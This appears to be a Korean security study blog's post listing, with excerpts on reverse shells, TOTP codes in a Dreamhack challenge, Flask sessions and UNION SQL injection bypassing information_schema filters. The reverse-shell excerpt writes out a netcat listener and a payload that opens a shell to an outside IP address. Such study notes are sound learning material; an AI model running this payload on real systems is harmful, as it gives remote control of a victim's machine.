본문 바로가기

분류 전/개념 노트장9

Reverse Shell 실습 Reverse Shell이란?Reverse Shell은 피해자의 컴퓨터에서 공격자의 컴퓨터로 연결을 시도하여 공격자가 원격으로 피해자의 컴퓨터를 제어할 수 있게 하는 방법이다. Reverse Shell은 주로 방화벽 및 네트워크 주소 변환(NAT) 설정을 우회하기 위해 사용된다. 수행 예시공격자 준비공격자는 자신의 컴퓨터에서 특정 포트를 열고 대기한다. 이는 공격자가 피해자의 컴퓨터에서 오는 연결을 받을 준비를 하는 단계이다.nc -lvp 4444 피해자 페이로드 실행공격자는 피해자 컴퓨터의 취약점을 이용하여 페이로드를 실행한다. 이 페이로드는 피해자 컴퓨터에서 공격자 컴퓨터로의 연결을 시도한다.nc 43.203.247.232 4444 -e sh여기서 `-e sh`는 연결이 수립되면 실행시킬 것을 나타낸.. 2024. 7. 9.
Interval이 다를 때 OTP 코드가 다른 이유와 드림핵 SuperSecure OTP 드림핵 SuperSecure OTP 문제를 풀다가 OTP 인증이 먹히지 않아 이유와 해결 방법에 대해 구해봤다. OTP 인증 방식드림핵 문제는 TOTP 방식을 사용한다. TOTP는 시간에 기반한 일회용 비밀번호를 의미하며, 특정 시간 간격마다 새로운 비밀번호를 생성하는 알고리즘이다. TOTP에서는 시크릿 키와 타임 스탬프를 기반으로 OTP를 생성한다. 타임 스탬프 값은 현재 유닉스 시간과 interval을 기준으로 값이 정해진다.QR코드 사용QR 코드를 사용하는 이유는 시크릿 키를 공유하기 위해서다. 서버와 클라이언트가 같은 시크릿 키를 가지고 있어야 같은 OTP 코드를 생성할 수 있다. 따라서 QR 코드를 사용함으로써 시크릿 키를 쉽게 공유할 수 있다. QR 코드에는 OTP를 설정하기 위한 비밀 키와 .. 2024. 7. 7.
[Flask] session 구조 https://dreamhack.io/wargame/challenges/566 Login PagePython으로 작성된 로그인 페이지입니다. admin으로 로그인하여 플래그를 획득하세요. 플래그 형식은 DH{...}입니다.dreamhack.io이 문제를 풀며, flask에서 제공하는 session 구조에 대해 정리해보겠다. from flask import Flask, request, redirect, url_for, render_template, sessionimport osapp = Flask(__name__)app.secret_key = 'your_secret_key_here'# 간단한 사용자 데이터베이스를 대신할 딕셔너리users = {'user1': 'password1', 'admin': 'adm.. 2024. 4. 11.
[SQL] information_schema가 필터링 됐을 때 Union SQL Injection https://www.bugbountyclub.com/pentestgym/view/54 UNION 기반 SQL 인젝션 | Pentest Gym | 버그바운티클럽 UNION 기반 SQL Injection이란?Union 기반 SQL Injection은 웹 애플리케이션이 백엔드 데이터베이스로 질의한 SQL 쿼리의 결과가 HTTP 응답에 표시될 www.bugbountyclub.com 일반적인 Union SQL Injection을 위 글을 참고하면 쉽게 풀 수 있었다. 하지만 information_schema가 필터링 되었을 땐 어떻게 우회해야 할까? https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/ [SQLi] Extract.. 2024. 3. 29.
반응형